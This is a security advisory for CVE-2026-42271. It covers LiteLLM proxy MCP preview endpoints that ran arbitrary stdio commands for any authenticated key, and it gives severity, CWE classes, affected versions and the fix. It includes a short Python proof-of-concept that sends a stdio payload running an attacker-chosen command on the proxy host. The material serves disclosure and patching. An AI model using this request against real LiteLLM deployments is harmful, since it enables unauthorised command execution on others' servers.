
Description

LiteLLM is a proxy server (AI Gateway) for calling LLM APIs in the OpenAI (or provider-native) format. Starting in version 1.74.2 and prior to version 1.83.7, two endpoints used to preview an MCP server before saving it, POST /mcp-rest/test/connection and POST /mcp-rest/test/tools/list, accepted a full server configuration in the request body, including the command, args, and env fields used by the stdio transport. When called with a stdio configuration, the endpoints attempted to connect, which spawned the supplied command as a subprocess on the proxy host with the privileges of the proxy process. The endpoints were gated only by a valid proxy API key, with no role check, so any authenticated user, including holders of low-privilege internal-user keys, could run arbitrary commands on the host. This issue has been patched in version 1.83.7.
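To make the attack surface concrete, below is a minimal proof-of-concept sketch of the kind of request the unpatched preview endpoint accepted. It assumes a proxy reachable at http://localhost:4000 and any valid proxy API key; the endpoint path and the command, args, and env fields come from the description above, while the exact payload schema (including the transport field name), the URL, and the key value are illustrative assumptions rather than the advisory's literal exploit.

```python
# Hypothetical proof-of-concept sketch of the pre-1.83.7 behavior.
# Assumes a LiteLLM proxy at PROXY_URL and any valid proxy API key;
# payload field names beyond command/args/env are assumptions.
import requests

PROXY_URL = "http://localhost:4000"         # assumption: local test proxy
API_KEY = "sk-low-privilege-internal-user"  # assumption: any valid key sufficed

# A stdio-transport MCP server config. On vulnerable versions, the preview
# endpoint attempted to connect, spawning `command` as a subprocess on the
# proxy host with the proxy process's privileges.
payload = {
    "transport": "stdio",                   # assumed field name for the transport selector
    "command": "touch",                     # attacker-chosen binary
    "args": ["/tmp/pwned-by-mcp-preview"],  # attacker-chosen arguments
    "env": {},                              # attacker-controlled environment
}

resp = requests.post(
    f"{PROXY_URL}/mcp-rest/test/connection",
    headers={"Authorization": f"Bearer {API_KEY}"},
    json=payload,
    timeout=10,
)
print(resp.status_code, resp.text)
```

If the marker file appears on the proxy host after the call, the supplied command ran with the proxy's privileges; upgrading to 1.83.7 or later is the published fix.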

Status: PUBLISHED | Reserved: 2026-04-26 | Published: 2026-05-08 | Updated: 2026-05-08 | Assigner: GitHub_M

Severity

HIGH: 8.7 | CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:N/SA:N

Problem types

CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Product status

Affected: >= 1.74.2, < 1.83.7

References

github.com/...itellm/security/advisories/GHSA-v4p8-mg3p-g94g

github.com/BerriAI/litellm/releases/tag/v1.83.7-stable

cve.org (CVE-2026-42271)

nvd.nist.gov (CVE-2026-42271)
